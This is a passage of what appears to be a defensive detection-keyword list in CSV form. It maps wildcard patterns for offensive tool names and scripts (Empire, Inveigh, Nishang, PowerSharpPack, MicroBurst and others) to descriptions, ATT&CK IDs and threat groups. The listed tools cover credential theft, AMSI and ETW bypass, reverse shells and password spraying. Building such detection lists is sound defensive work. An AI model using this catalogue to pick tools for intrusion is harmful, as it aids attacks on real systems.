Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*-InveighRelay *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Inveigh-Relay.ps1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*inveighzero.exe*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*InvisibilityCloak.py*,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - 
T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,1,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -*Invisi-Shell*,offensive_tool_keyword,Invisi-Shell,Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.,T1059 - T1053 - T1027 - T1055 - T1562,TA0002 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/OmerYa/Invisi-Shell,1,0,N/A,N/A,10,921,143,2019-08-19T19:55:19Z,2018-10-14T23:32:56Z -*invoke obfuscation*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*invoke* -Action command -Execute * 
-Session*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,0,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-*WDigestDowngrade.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*invoke_obfuscation.py*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*invoke_sessiongopher.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*Invoke-AccessCheckForAllGroups*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForAllServicePrincipals*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active 
Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForAllUsers*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForCurrentUser*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForCurrentUser*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForGroup*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForServicePrincipal*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForUser*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-ACLcsvFileAnalysis*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Invoke-ACLPwn*,offensive_tool_keyword,Invoke-ACLpwn,Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.,T1098 - T1208 - T1484 - T1486 - T1059,TA0005 - TA0007,N/A,N/A,Exploitation tools,https://github.com/fox-it/Invoke-ACLPwn,1,0,N/A,N/A,5,498,86,2022-09-15T15:13:00Z,2018-04-26T09:21:27Z -*Invoke-ACLScanner * -Filter *,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Invoke-ACLScanner * -Name *,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*invoke-aclscanner*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - 
T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-ACLScanner*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-ADCSTemplateRecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-ADSBackdoor*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Invoke-ADSBackdoor*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-AirstrikeAttackCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-AllAccessChecks*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AllChecks*,offensive_tool_keyword,AD exploitation cheat sheet,Check for vulnerable programs and configs,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-AmsiBypass*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Invoke-AmsiBypass*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-APIConnectionHijack.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-ApplicationsOnStartupCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ApplicationsOnStartupCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ARPScan*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ARPScan.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-arpscan*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-ARPScan.ps1*,offensive_tool_keyword,empire,Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ASREPRoast*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*InvokeAssembly.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Invoke-AutoKerberoast*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*Invoke-AzElevatedAccessToggle*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-AzRESTBastionShareableLink*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-AzureEnum.ps1*,offensive_tool_keyword,Invoke-AzureEnum,This cmdlet is used to perform users enumeration against Azure,T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1,1,1,N/A,N/A,5,417,85,2023-04-05T22:03:19Z,2019-11-20T22:07:50Z -*Invoke-AzurePasswordSpray*,offensive_tool_keyword,Invoke-AzurePasswordSpray,This cmdlet is used to perform a password spray attack against Azure 
accounts using legacy Basic Authentication,T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1,1,1,N/A,N/A,5,417,85,2023-04-05T22:03:19Z,2019-11-20T22:07:50Z -*Invoke-AzureRmVMBulkCMD.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-AzVMBulkCMD.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-BackdoorLNK*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BackdoorLNK.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-BackdoorLNK*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-BadPotato*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-BadZure*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z 
-*Invoke-BetterSafetyKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Binary *.exe*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*Invoke-BitlockerCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-BlockETW*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-BlockETW*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 